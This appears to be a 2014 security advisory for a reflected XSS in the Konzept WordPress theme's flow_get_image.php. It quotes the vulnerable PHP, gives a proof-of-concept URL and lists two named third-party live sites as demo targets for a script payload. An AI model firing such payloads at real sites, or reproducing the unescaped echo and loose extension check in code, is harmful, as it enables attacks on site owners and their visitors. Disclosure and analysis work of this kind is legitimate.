
Konzept WordPress theme – reflected Cross-Site Scripting (XSS) vulnerability

Author: Pro_Mast3r, Published: 05-11-2014
#[~] Type : Reflected Cross-Site Scripting (XSS) – unescaped echo of the `image` query parameter
#[~] Vendor : Theme konzept
#[~] Site Vendor : http://devatic.com/
#[~] Author : ProMast3r
#[~] Mail : Pro.Mast3r@hotmail.com
--------------------------------------------------------
#[~] Vulnerable file : wp-content/themes/konzept/admin/superslide/flow_get_image.php (reachable without authentication in the PoC below)
#[~] Source excerpt : lines 10 - 24 of that file. The opening `if` that pairs with the `}else{` near the end is not shown. The XSS sink is the final `echo $_GET['image'];`, which writes the parameter back unescaped with no Content-Type header set, so the browser renders it as HTML by default. Note that the same parameter is also handed to file_get_contents() in the first branch after only a loose extension check, so the file-serving path deserves review as a possible arbitrary file read as well – this advisory does not demonstrate that.
// $value comes straight from the query string: attacker-controlled and never sanitised.
$value = $_GET['image'];
// Map of allowed extensions => MIME types (WordPress helper; presumably keyed like 'jpg|jpeg|jpe' – not visible here).
$mimes = get_allowed_mime_types();
// "Extension" = text after the last dot. A value with no dot yields the whole string; a trailing dot yields ''.
$file_ext = explode('.',$value);
foreach($mimes as $type => $mime){
// NOTE(review): this is a substring test, not an exact match – any needle that occurs anywhere inside a key
// passes (e.g. 'jp'), and with an empty needle (trailing dot) strpos() behaviour is PHP-version dependent.
// It is the only filter applied before $value reaches the filesystem below; there is no path
// normalisation and no base-directory restriction.
if(strpos($type, end($file_ext)) !== false){
// fileExists() is not PHP's file_exists(); presumably a theme helper – whether it accepts relative paths
// or URL wrappers is not visible from this excerpt.
if(fileExists($value)){
// Reads and serves whatever path the caller supplied; treat as a potential arbitrary-file-read sink,
// not only as the XSS documented in this advisory – TODO confirm against the full file.
$contents = file_get_contents($value);
// Served inline with the MIME type of the first key that matched, then the loop stops.
header('Content-type: '.$mime);
echo $contents;
break;
}
}
}
}else{
echo $_GET['image'];
}
--------------------------------------------------------
#[~] PoC (local test) : http://127.0.0.1/wordpress/wp-content/themes/konzept/admin/superslide/flow_get_image.php?image=XSS – replace `XSS` with a URL-encoded script payload as in the demo URLs below; the value is reflected into the response body unescaped.
#[~] Demo (third-party sites live at time of publication; test only against systems you are authorised to assess) : http://isthis.gd//wp-content/themes/konzept/admin/superslide/flow_get_image.php?image=%3Cscript%3Ealert%281%29%3C/script%3E
http://www.clickboompow.com///wp-content/themes/konzept/admin/superslide/flow_get_image.php?image=%3Cscript%3Ealert%281%29%3C/script%3E
---------------------------------------------------------
#exploit4arab
#IRAQCyberArmy
